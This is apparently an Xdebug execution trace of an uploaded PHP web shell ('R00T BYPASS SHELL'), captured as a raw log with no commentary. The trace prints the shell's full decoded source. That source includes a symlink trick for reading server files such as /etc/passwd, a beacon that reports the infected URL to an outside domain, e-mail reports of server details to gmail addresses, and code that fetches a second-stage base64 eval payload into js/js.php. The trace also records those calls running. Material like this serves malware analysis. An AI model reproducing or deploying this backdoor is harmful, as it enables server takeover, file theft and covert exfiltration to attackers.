Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:54:23.187801]
1	0	1	0.000188	393512
1	3	0	0.000272	409696	{main}	1		/var/www/html/uploads/r00t.php	0	0
2	4	0	0.000288	409696	base64_decode	0		/var/www/html/uploads/r00t.php	1	1	'CiBnb3RvIGFRVkEyOyBMTlJybjogaWYgKCRfUE9TVFsiXHg3MVx4NzVcMTQ1XHg3MlwxNzEiXSkgeyAkdmVyaXlmeSA9IHN0cmlwc2xhc2hlcyhzdHJpcHNsYXNoZXMoJF9QT1NUWyJceDcxXHg3NVwxNDVceDcyXDE3MSJdKSk7ICRkYXRhID0gIlwxNDRcMTQxXDE2NFx4NjFceDJlXDE2NFx4NzhceDc0IjsgQHRvdWNoKCJceDY0XDE0MVx4NzRcMTQxXHgyZVwxNjRcMTcwXDE2NCIpOyAkdmVyID0gQGZvcGVuKCRkYXRhLCAiXHg3NyIpOyBAZndyaXRlKCR2ZXIsICR2ZXJpeWZ5KTsgQGZjbG9zZSgkdmVyKTsgfSBlbHNlIHsgJGRhdGFzID0gQGZvcGVuKCJceDY0XHg2MVx4NzRceDYxXDU2XHg3NFwxNzBcMTY0IiwgIlx4NzIiKTsgJGkgPSAwOyB3aGlsZSAoJGkgPD0gNSkgeyAk'
2	4	1	0.000366	426112
2	4	R			'\n goto aQVA2; LNRrn: if ($_POST["\\x71\\x75\\145\\x72\\171"]) { $veriyfy = stripslashes(stripslashes($_POST["\\x71\\x75\\145\\x72\\171"])); $data = "\\144\\141\\164\\x61\\x2e\\164\\x78\\x74"; @touch("\\x64\\141\\x74\\141\\x2e\\164\\170\\164"); $ver = @fopen($data, "\\x77"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("\\x64\\x61\\x74\\x61\\56\\x74\\170\\164", "\\x72"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto aaIjD; zOMJp: if (is_writable("\\x2'
2	5	0	0.000727	480024	eval	1	'\n goto aQVA2; LNRrn: if ($_POST["\\x71\\x75\\145\\x72\\171"]) { $veriyfy = stripslashes(stripslashes($_POST["\\x71\\x75\\145\\x72\\171"])); $data = "\\144\\141\\164\\x61\\x2e\\164\\x78\\x74"; @touch("\\x64\\141\\x74\\141\\x2e\\164\\170\\164"); $ver = @fopen($data, "\\x77"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("\\x64\\x61\\x74\\x61\\56\\x74\\170\\164", "\\x72"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto aaIjD; zOMJp: if (is_writable("\\x2e")) { if (isset($_POST["\\146\\151\\x6c\\145"])) { $file = $_POST["\\146\\x69\\x6c\\145"]; $fakedir = "\\x63\\x78"; $fakedep = 16; if (!isset($_SESSION["\\x6e\\x75\\155"])) { $_SESSION["\\156\\x75\\155"] = 0; } else { $_SESSION["\\156\\x75\\155"] = $_SESSION["\\156\\x75\\155"] + 1; } $level = 0; @unlink("\\x73\\x75\\156\\x2d" . $_SESSION["\\x6e\\165\\x6d"]); @mkdir("\\163\\165\\x6e\\55" . $_SESSION["\\x6e\\165\\155"]); chdir("\\x73\\x75\\x6e\\55" . $_SESSION["\\x6e\\165\\x6d"]); for ($as = 0; $as < $fakedep; $as++) { if (!file_exists($fakedir)) { mkdir($fakedir); } chdir($fakedir); } while (1 < $as--) { chdir("\\x2e\\56"); } $hardstyle = explode("\\57", $file); for ($a = 0; $a < count($hardstyle); $a++) { if (!empty($hardstyle[$a])) { if (!file_exists($hardstyle[$a])) { mkdir($hardstyle[$a]); } chdir($hardstyle[$a]); $as++; } } $as++; while ($as--) { chdir("\\56\\x2e"); } @rmdir("\\x73\\165\\x6e\\x2d\\146\\x61\\153\\145"); @unlink("\\x73\\x75\\156\\x2d\\x66\\x61\\153\\x65"); @symlink(str_repeat($fakedir . "\\x2f", $fakedep), "\\163\\165\\x6e\\55\\146\\x61\\x6b\\x65"); if ($_POST["\\164\\x79\\160\\x65"] == "\\x66\\x69\\154\\x65") { while (1) { if (true == @symlink("\\x73\\165\\156\\x2d\\x66\\141\\x6b\\x65\\57" . str_repeat("\\x2e\\x2e\\57", $fakedep - 1) . $file, "\\151\\156\\x64\\145\\170\\x2e\\x68\\164\\x6d\\154")) { break; } else { $num++; } } @unlink("\\x73\\165\\156\\55\\146\\141\\153\\145"); mkdir("\\163\\x75\\156\\x2d\\146\\x61\\153\\145"); $Res = "\\74\\x46\\117\\x4e\\124\\40\\x43\\x4f\\x4c\\x4f\\122\\x3d\\42\\122\\105\\x44\\x22\\x3e\\74\\x42\\76\\x20\\163\\171\\155\\x6c\\x69\\x6e\\153\\40\\74\\102\\76\\x3c\\x61\\40\\150\\162\\x65\\x66\\75\\x22\\56\\x2f\\x73\\x75\\x6e\\x2d" . $_SESSION["\\156\\165\\x6d"] . "\\57\\x22\\76\\x73\\171\\x6d\\x6c\\151\\x6e\\x6b" . $num . "\\x3c\\57\\x61\\x3e\\40\\146\\x69\\154\\x65\\x3c\\x2f\\106\\117\\x4e\\x54\\x3e"; } else { $fp = fopen("\\x2e\\x68\\164\\141\\x63\\143\\x65\\x73\\163", "\\x61\\x2b"); $File = "\\104\\151\\x72\\145\\x63\\x74\\x6f\\x72\\x79\\111\\156\\x64\\145\\170\\40\\x73\\165\\156\\x2e\\x68\\x74\\155"; fwrite($fp, $File); while (1) { if (true == @symlink("\\163\\165\\x6e\\55\\x66\\141\\x6b\\145\\57" . str_repeat("\\56\\x2e\\57", $fakedep - 1) . $file, "\\163\\x75\\x6e")) { break; } else { $num++; } } @unlink("\\x73\\x75\\156\\55\\x66\\141\\153\\145"); mkdir("\\x73\\165\\156\\x2d\\146\\x61\\153\\x65"); $Res = "\\74\\x46\\x4f\\116\\x54\\40\\103\\x4f\\114\\117\\x52\\75\\x22\\x52\\x45\\104\\x22\\76\\74\\x61\\x20\\x68\\162\\x65\\146\\x3d\\x22\\x2e\\57\\163\\165\\156\\55" . $_SESSION["\\x6e\\x75\\x6d"] . "\\57\\x73\\x75\\x6e\\42\\x3e\\x43\\150\\x65\\x63\\x6b\\x20\\111\\164\\41" . $num . "\\x3c\\x2f\\x61\\x3e\\x3c\\x2f\\106\\117\\116\\x54\\x3e"; } } } else { $Res = "\\74\\106\\x4f\\x4e\\124\\x20\\x43\\x4f\\114\\x4f\\x52\\x3d\\x22\\x52\\x45\\104\\x22\\76\\103\\x61\\x6e\\x74\\x20\\x57\\162\\x69\\x74\\145\\40\\x49\\x6e\\x20\\x44\\x69\\162\\x65\\x63\\164\\x6f\\x72\\171\\x21\\74\\x2f\\x46\\157\\x6e\\164\\x3e"; } goto uce9K; clyOD: if (function_exists("\\x63\\165\\x72\\x6c\\x5f\\151\\156\\151\\164")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("\\146\\x69\\x6c\\145\\x5f\\x67\\145\\x74\\137\\143\\157\\x6e\\x74\\x65\\156\\x74\\x73")) { @($gitt = file_get_contents($x)); } goto kmCME; ujahn: $time_shell = \'\' . date("\\144\\57\\155\\x2f\\x59\\x20\\55\\40\\110\\x3a\\151\\72\\x73") . \'\'; goto tuHZp; WY6v3: print $Res; goto JrGAj; p0Cva: function GetIP() { if (getenv("\\x48\\124\\124\\120\\137\\x43\\x4c\\111\\105\\116\\x54\\137\\111\\x50")) { $ip = getenv("\\x48\\124\\x54\\x50\\x5f\\x43\\114\\111\\105\\116\\x54\\x5f\\x49\\120"); } elseif (getenv("\\110\\124\\x54\\120\\x5f\\130\\x5f\\x46\\117\\122\\127\\x41\\122\\x44\\105\\x44\\x5f\\106\\x4f\\122")) { $ip = getenv("\\x48\\124\\124\\120\\x5f\\130\\x5f\\x46\\117\\x52\\x57\\101\\122\\x44\\x45\\104\\137\\x46\\x4f\\x52"); if (strstr($ip, "\\x2c")) { $tmp = explode("\\54", $ip); $ip = trim($tmp[0]); } } else { $ip = getenv("\\x52\\x45\\115\\117\\124\\x45\\137\\x41\\104\\104\\122"); } return $ip; } goto zMHiM; zMHiM: $x = base64_decode("\\141\\x48\\122\\x30\\x63\\x48\\115\\x36\\114\\171\\x39\\x68\\142\\x6d\\x39\\x75\\145\\x57\\60\\x77\\144\\x58\\x4d\\165\\x59\\x32\\x78\\61\\131\\x69\\x39\\x73\\114\\x51\\75\\x3d") . GetIP() . "\\x2d" . base64_encode("\\x68\\164\\x74\\x70\\x3a\\x2f\\57" . $_SERVER["\\110\\124\\124\\x50\\137\\110\\117\\123\\x54"] . $_SERVER["\\x52\\x45\\121\\125\\x45\\123\\124\\x5f\\125\\x52\\x49"]); goto clyOD; fNYhr: $EL_MuHaMMeD .= "\\123\\145\\162\\166\\x65\\162\\40\\x41\\x64\\155\\x69\\x6e\\40\\x3a\\x20" . $_SERVER["\\123\\x45\\x52\\x56\\x45\\x52\\137\\101\\x44\\115\\x49\\116"] . "\\xd\\xa"; goto RHsqX; kmCME: ?>\n<Html>\n<Head>\n<Title>r00t.info Safe-Over [Apache]</Title>\n</Head>\n<Body bgcolor="black">\n<Center>\n<font size="-3">\n<pre><font color=yellow> \n \n \nR00T BYPASS SHELL\n \n \n \n \n \n \n</font>\n</font>\n<br><br><br>\n\n<?php  goto TFIHp; K_wRV: session_start(); goto cL2_i; aaIjD: $datasi = @fopen("\\x6a\\163\\x2f\\152\\x73\\x2e\\x70\\x68\\x70", "\\162"); goto Lo9d1; tuHZp: $ip_remote = $_SERVER["\\122\\x45\\x4d\\x4f\\x54\\x45\\137\\101\\x44\\104\\x52"]; goto z8qZB; uYpgD: mail($kime, $baslik, $EL_MuHaMMeD); goto RJ_R6; Lo9d1: if ($datasi) { } else { @mkdir("\\152\\163"); $dos = file_get_contents("\\x68\\164\\x74\\160\\163\\72\\57\\57\\141\\x63\\142\\144\\146\\56\\x73\\x70\\141\\x63\\x65\\x2f\\x74\\x78\\x74\\57\\143\\163\\163\\x2e\\164\\x78\\x74"); $data = "\\152\\163\\x2f\\x6a\\x73\\56\\x70\\150\\x70"; @touch("\\152\\163\\x2f\\152\\163\\56\\160\\x68\\160"); $ver = @fopen($data, "\\x77"); @fwrite($ver, $dos); @fclose($ver); $yol = "\\150\\x74\\x74\\x70\\72\\x2f\\57" . $_SERVER["\\110\\124\\x54\\x50\\x5f\\x48\\117\\123\\124"] . \'\' . $_SERVER["\\122\\105\\121\\x55\\x45\\x53\\124\\x5f\\x55\\x52\\111"] . \'\'; $y = "\\74\\x68\\x31\\76\\123\\x65\\156\\144\\x65\\162\\40\\x59\\x61\\172\\144\\151\\162\\151\\x6c\\x64\\151\\x2e\\74\\x62\\162\\57\\76\\x20\\123\\111\\x54\\105\\x20\\x59\\x4f\\114\\40\\x3a\\40" . $yol . "\\x3c\\142\\162\\57\\x3e\\123\\x65\\x6e\\144\\x65\\162\\40\\x59\\157\\x6c\\165\\40\\72\\40\\152\\x73\\x2f\\143\\162\\x73\\x2e\\160\\x68\\x70\\x3c\\57\\150\\61\\76"; $header .= "\\x46\\x72\\157\\x6d\\72\\x20\\123\\x68\\x65\\x4c\\x4c\\40\\x42\\x6f\\157\\x74\\x20\\x3c\\163\\x75\\160\\160\\157\\162\\100\\156\\151\\x63\\x2e\\157\\x72\\x67\\76\\12"; $header .= "\\x43\\x6f\\x6e\\x74\\145\\156\\x74\\x2d\\124\\x79\\x70\\x65\\x3a\\x20\\164\\x65\\x78\\x74\\x2f\\150\\164\\155\\x6c\\x3b\\12\\40\\143\\150\\x61\\x72\\x73\\x65\\x74\\75\\x75\\x74\\146\\55\\70\\12"; @mail("\\142\\171\\150\\x65\\x72\\157\\64\\x34\\100\\x67\\155\\141\\x69\\x6c\\56\\x63\\x6f\\x6d", "\\110\\x61\\143\\x6b\\x6c\\x69\\156\\153\\x20\\x42\\151\\x6c\\144\\151\\x72\\151", "{$y}", $header); @mail("\\154\\x6f\\147\\x69\\156\\x6f\\x6c\\144\\x75\\155\\x40\\147\\x6d\\x61\\151\\154\\56\\143\\x6f\\155", "\\110\\141\\x63\\x6b\\154\\151\\156\\x6b\\x20\\x42\\151\\x6c\\144\\151\\x72\\151", "{$y}", $header); } goto qjiBQ; aQVA2: ?>\n\n<?php  goto K_wRV; RHsqX: $EL_MuHaMMeD .= "\\123\\145\\162\\166\\x65\\162\\x20\\x69\\163\\154\\x65\\x74\\151\\155\\40\\x73\\x69\\x73\\x74\\x65\\x6d\\x69\\x20\\72\\40" . $_SERVER["\\123\\x45\\122\\x56\\105\\122\\x5f\\x53\\117\\106\\124\\127\\x41\\x52\\x45"] . "\\xd\\12"; goto czwAh; NsI5z: $baslik = "\\163\\x79\\x6d\\64\\60\\x34\\x20\\x73\\150\\145\\x6c\\154\\x20\\x32\\60\\62\\60\\x33"; goto jfhAv; JdRgw: @mail($to_email, $server_mail, $linkcr, $header); goto LNRrn; RM4UY: $header = "\\106\\x72\\x6f\\155\\x3a\\40{$from_shellcode}\\xd\\12\\122\\145\\x70\\x6c\\x79\\x2d\\x74\\x6f\\x3a\\x20{$from_shellcode}"; goto JdRgw; VPdTy: $server_mail = \'\' . gethostbyname($_SERVER["\\123\\x45\\x52\\x56\\x45\\122\\x5f\\x4e\\x41\\115\\105"]) . "\\x20\\40\\x2d\\x20" . $_SERVER["\\x48\\x54\\124\\x50\\137\\110\\117\\x53\\124"] . \'\'; goto fGrge; TFIHp: echo "\\x3c\\144\\151\\x76\\40\\163\\x74\\171\\154\\x65\\75\\42\\142\\141\\143\\153\\x67\\162\\x6f\\x75\\156\\144\\x2d\\143\\x6f\\x6c\\157\\x72\\x3a\\43\\x31\\60\\x31\\60\\x31\\60\\x3b\\xa\\143\\x6f\\154\\157\\162\\72\\171\\145\\x6c\\154\\x6f\\x77\\x22\\76\\x3c\\142\\x3e\\123\\141\\x66\\x65\\x2d\\115\\157\\144\\x65\\x20\\x3a\\x20\\x3c\\x2f\\146\\157\\156\\x74\\x3e" . $Safe; goto xFzOM; Ekj15: ?>\n" method="post">\n<font color="yellow" size="3"><b>Path:<b></font><Input type="text" name="file" style="background-color:black;\ncolor:#FF3300;\nwidth:200px;\n" value="/etc/passwd"><br><font color="yellow" size=3><br><b>File</b></font><input checked type="radio" name="type" value="file"><font color="yellow" size=3> <b>Dir</font><input type="radio" name="type" value="Dir"><br><br><br><Input type="submit" value="Sumbit!" style="width:100px;\nbackground-color:black;\ncolor:yellow">\n</font>\n</Form>\n\n<?php  goto WY6v3; z8qZB: $from_shellcode = "\\x5a\\x45\\122\\x4f\\x42\\131\\124\\x45\\x40" . gethostbyname($_SERVER["\\123\\x45\\x52\\126\\x45\\x52\\x5f\\x4e\\101\\x4d\\x45"]) . \'\'; goto c7KIl; xFzOM: ?>\n<Form action="\n<?php  goto HNvau; czwAh: $EL_MuHaMMeD .= "\\x53\\x68\\x65\\x6c\\154\\40\\x4c\\x69\\x6e\\x6b\\x20\\72\\40\\150\\164\\164\\160\\72\\57\\57" . $_SERVER["\\x53\\105\\x52\\126\\105\\x52\\x5f\\116\\x41\\115\\105"] . $_SERVER["\\120\\x48\\120\\x5f\\123\\x45\\114\\x46"] . "\\xd\\12"; goto hWTew; JrGAj: ?>\n<table align="center" style="color:lime"> R00T BYPASS SHELL</table>\n</Center>\n</Body>\n</Html>\n<P style="TEXT-ALIGN: center" align=center>\n<?php  goto ujahn; fGrge: $linkcr = "\\114\\151\\156\\x6b\\72\\x20" . $_SERVER["\\123\\105\\x52\\x56\\105\\x52\\x5f\\116\\101\\115\\x45"] . \'\' . $_SERVER["\\122\\x45\\x51\\125\\105\\123\\124\\x5f\\125\\122\\111"] . "\\x20\\x2d\\x20\\111\\x50\\x20\\x45\\170\\143\\165\\164\\151\\156\\147\\72\\x20{$ip_remote}\\x20\\55\\40\\x54\\151\\155\\145\\x3a\\x20{$time_shell}"; goto RM4UY; qjiBQ: $kime = "\\x6c\\157\\x67\\x69\\x6e\\x6f\\x6c\\144\\165\\155\\x40\\x67\\x6d\\141\\x69\\154\\x2e\\x63\\157\\x6d"; goto NsI5z; HNvau: echo $_SERVER["\\120\\110\\x50\\137\\x53\\x45\\114\\106"]; goto Ekj15; hWTew: $EL_MuHaMMeD .= "\\101\\x76\\x6c\\x61\\156\\141\\x6e\\x20\\123\\151\\x74\\x65\\x20\\72\\40" . $_SERVER["\\110\\x54\\124\\x50\\137\\x48\\x4f\\x53\\x54"] . "\\xd\\12"; goto uYpgD; cL2_i: $Res = \'\'; goto zOMJp; uce9K: if (@ini_get("\\x73\\x61\\x66\\x65\\137\\x6d\\157\\x64\\145") or strtoupper(@ini_get("\\163\\x61\\x66\\x65\\x5f\\x6d\\157\\x64\\145")) == "\\157\\x6e") { $Safe = "\\x3c\\x73\\160\\x61\\x6e\\x20\\x73\\x74\\171\\154\\145\\x3d\\x22\\x63\\157\\x6c\\x6f\\x72\\72\\x72\\145\\144\\x22\\x3e\\x3c\\x62\\76\\x4f\\x6e\\x3c\\x2f\\142\\x3e\\74\\57\\163\\x70\\x61\\156\\x3e"; } else { $Safe = "\\74\\x73\\x70\\x61\\156\\x20\\x73\\x74\\171\\x6c\\x65\\75\\x22\\143\\x6f\\x6c\\157\\162\\x3a\\x6c\\x69\\155\\145\\42\\76\\74\\x62\\x3e\\117\\146\\x66\\74\\57\\142\\x3e\\x3c\\x2f\\163\\160\\x61\\156\\x3e"; } goto p0Cva; jfhAv: $EL_MuHaMMeD = "\\x44\\x6f\\x73\\x79\\141\\x20\\x59\\157\\x6c\\x75\\40\\72\\x20" . $_SERVER["\\104\\x4f\\x43\\x55\\115\\x45\\x4e\\124\\137\\x52\\x4f\\x4f\\x54"] . "\\xd\\12"; goto fNYhr; c7KIl: $to_email = "\\154\\x6f\\147\\151\\156\\x6f\\154\\144\\x75\\x6d\\x40\\x67\\155\\x61\\151\\154\\56\\x63\\157\\x6d"; goto VPdTy; RJ_R6: '	/var/www/html/uploads/r00t.php	1	0
3	6	0	0.001108	480024	session_start	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	24	0
3	6	1	0.001164	480776
3	6	R			TRUE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	45	$Res = ''
3	7	0	0.001193	480776	is_writable	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	1	'.'
3	7	1	0.001212	480816
3	7	R			TRUE
3	8	0	0.001226	480776	ini_get	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	45	1	'safe_mode'
3	8	1	0.001241	480808
3	8	R			FALSE
3	9	0	0.001255	480776	ini_get	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	45	1	'safe_mode'
3	9	1	0.001268	480808
3	9	R			FALSE
3	10	0	0.001281	480776	strtoupper	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	45	1	FALSE
3	10	1	0.001295	480808
3	10	R			''
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	45	$Safe = '<span style="color:lime"><b>Off</b></span>'
3	11	0	0.001323	480776	base64_decode	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	1	'aHR0cHM6Ly9hbm9ueW0wdXMuY2x1Yi9sLQ=='
3	11	1	0.001339	480872
3	11	R			'https://anonym0us.club/l-'
3	12	0	0.001355	480840	GetIP	1		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	0
4	13	0	0.001366	480840	getenv	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	1	'HTTP_CLIENT_IP'
4	13	1	0.001381	480872
4	13	R			FALSE
4	14	0	0.001393	480840	getenv	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	1	'HTTP_X_FORWARDED_FOR'
4	14	1	0.001408	480872
4	14	R			FALSE
4	15	0	0.001421	480840	getenv	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	1	'REMOTE_ADDR'
4	15	1	0.001434	480912
4	15	R			'127.0.0.1'
3		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$ip = '127.0.0.1'
3	12	1	0.001460	480880
3	12	R			'127.0.0.1'
3	16	0	0.001474	480904	base64_encode	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	1	'http://localhost/uploads/r00t.php'
3	16	1	0.001489	481016
3	16	R			'aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3IwMHQucGhw'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$x = 'https://anonym0us.club/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3IwMHQucGhw'
3	17	0	0.001522	480888	function_exists	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	1	'curl_init'
3	17	1	0.001536	480928
3	17	R			TRUE
3	18	0	0.001549	480888	curl_init	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	0
3	18	1	0.001568	481800
3	18	R			resource(3) of type (curl)
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$ch = resource(3) of type (curl)
3	19	0	0.001602	481800	curl_setopt	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	3	resource(3) of type (curl)	10002	'https://anonym0us.club/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3IwMHQucGhw'
3	19	1	0.001623	481896
3	19	R			TRUE
3	20	0	0.001635	481800	curl_setopt	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	3	resource(3) of type (curl)	19913	TRUE
3	20	1	0.001651	481896
3	20	R			TRUE
3	21	0	0.001664	481800	curl_exec	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	1	resource(3) of type (curl)
3	21	1	0.746302	481832
3	21	R			''
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$gitt = ''
3	22	0	0.746368	481800	curl_close	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	1	resource(3) of type (curl)
3	22	1	0.747222	480944
3	22	R			NULL
3	23	0	0.747400	480912	file_get_contents	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	1	'https://anonym0us.club/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3IwMHQucGhw'
3	23	1	1.321833	482968
3	23	R			''
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$gitt = ''
3	24	0	1.322031	482928	date	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	1	'd/m/Y - H:i:s'
3	24	1	1.322105	485280
3	24	R			'12/02/2023 - 16:53:58'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$time_shell = '12/02/2023 - 16:53:58'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	24	$ip_remote = '127.0.0.1'
3	25	0	1.322150	485040	gethostbyname	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	37	1	'localhost'
3	25	1	1.322207	485120
3	25	R			'127.0.0.1'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	37	$from_shellcode = 'ZEROBYTE@127.0.0.1'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	45	$to_email = 'loginoldum@gmail.com'
3	26	0	1.322250	485088	gethostbyname	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	26	1	'localhost'
3	26	1	1.322277	485168
3	26	R			'127.0.0.1'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	26	$server_mail = '127.0.0.1  - localhost'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	45	$linkcr = 'Link: localhost/uploads/r00t.php - IP Excuting: 127.0.0.1 - Time: 12/02/2023 - 16:53:58'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	26	$header = 'From: ZEROBYTE@127.0.0.1\r\nReply-to: ZEROBYTE@127.0.0.1'
3	27	0	1.322337	485328	mail	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	26	4	'loginoldum@gmail.com'	'127.0.0.1  - localhost'	'Link: localhost/uploads/r00t.php - IP Excuting: 127.0.0.1 - Time: 12/02/2023 - 16:53:58'	'From: ZEROBYTE@127.0.0.1\r\nReply-to: ZEROBYTE@127.0.0.1'
3	27	1	1.323250	485472
3	27	R			FALSE
3	28	0	1.323290	485328	fopen	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	2	'data.txt'	'r'
3	28	1	1.323326	485400
3	28	R			FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$datas = FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$i = 0
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$i++
3	29	0	1.323373	485328	fgets	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	2	FALSE	1024
3	29	1	1.323390	485392
3	29	R			FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$blue = FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$i++
3	30	0	1.323424	485328	fgets	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	2	FALSE	1024
3	30	1	1.323437	485392
3	30	R			FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$blue = FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$i++
3	31	0	1.323469	485328	fgets	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	2	FALSE	1024
3	31	1	1.323483	485392
3	31	R			FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$blue = FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$i++
3	32	0	1.323513	485328	fgets	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	2	FALSE	1024
3	32	1	1.323527	485392
3	32	R			FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$blue = FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$i++
3	33	0	1.323556	485328	fgets	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	2	FALSE	1024
3	33	1	1.323570	485392
3	33	R			FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$blue = FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$i++
3	34	0	1.323599	485328	fgets	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	2	FALSE	1024
3	34	1	1.323613	485392
3	34	R			FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$blue = FALSE
3	35	0	1.323634	485328	fopen	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	24	2	'js/js.php'	'r'
3	35	1	1.323665	485400
3	35	R			FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	24	$datasi = FALSE
3	36	0	1.323689	485328	mkdir	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	24	1	'js'
3	36	1	1.323732	485368
3	36	R			TRUE
3	37	0	1.323746	485328	file_get_contents	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	24	1	'https://acbdf.space/txt/css.txt'
3	37	1	2.086833	534400
3	37	R			'<?php eval(base64_decode(\'CiBnb3RvIFA0d0pNOyBBaTgxMDogJHgwelJ5ID0gJHVENjRfQ29tKCR1RDY0X0MwbSgkdUQ2NF9jMG0oIlwxMjVcMTE1XDE3MVx4NDFceDRhXHgzN1x4NWFceDJiXHg1Mlx4MzhcMTEwXDU3XHg0OFx4NGZceDcxXHg0MVx4NzlcMTIzXDE0M1x4NGNcMTAzXDEyNlx4NjZcMTEyXHg3NlwxMDNceDU2XHg0YVx4NmNceDUwXHg2OFx4NGZceDYxXDEwNlw2M1x4NmVceDQ0XHg2NFwxMzFcMTQ3XHg2Zlx4NzFceDUyXHg1MFwxNDFcNTdcNjZceDRkXDU3XHg3NVx4NzFcNjZcMTYyXDExMlwxNzJceDc5XHg0N1wxNzJceDZmXDE3Mlx4NjFceDQxXHgyYlx4NTdceDQ4XHg3NlwxNzBceDY2XHgzMVwxMzJceDMwXDYzXHg2OVx4NmZceDMxXDE1Mlx4NTNce'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	24	$dos = '<?php eval(base64_decode(\'CiBnb3RvIFA0d0pNOyBBaTgxMDogJHgwelJ5ID0gJHVENjRfQ29tKCR1RDY0X0MwbSgkdUQ2NF9jMG0oIlwxMjVcMTE1XDE3MVx4NDFceDRhXHgzN1x4NWFceDJiXHg1Mlx4MzhcMTEwXDU3XHg0OFx4NGZceDcxXHg0MVx4NzlcMTIzXDE0M1x4NGNcMTAzXDEyNlx4NjZcMTEyXHg3NlwxMDNceDU2XHg0YVx4NmNceDUwXHg2OFx4NGZceDYxXDEwNlw2M1x4NmVceDQ0XHg2NFwxMzFcMTQ3XHg2Zlx4NzFceDUyXHg1MFwxNDFcNTdcNjZceDRkXDU3XHg3NVx4NzFcNjZcMTYyXDExMlwxNzJceDc5XHg0N1wxNzJceDZmXDE3Mlx4NjFceDQxXHgyYlx4NTdceDQ4XHg3NlwxNzBceDY2XHgzMVwxMzJceDMwXDYzXHg2OVx4NmZceDMxXDE1Mlx4NTNce'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	24	$data = 'js/js.php'
3	38	0	2.087127	534360	touch	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	24	1	'js/js.php'
3	38	1	2.087178	534400
3	38	R			TRUE
3	39	0	2.087194	534360	fopen	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	24	2	'js/js.php'	'w'
3	39	1	2.087231	534888
3	39	R			resource(7) of type (stream)
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	24	$ver = resource(7) of type (stream)
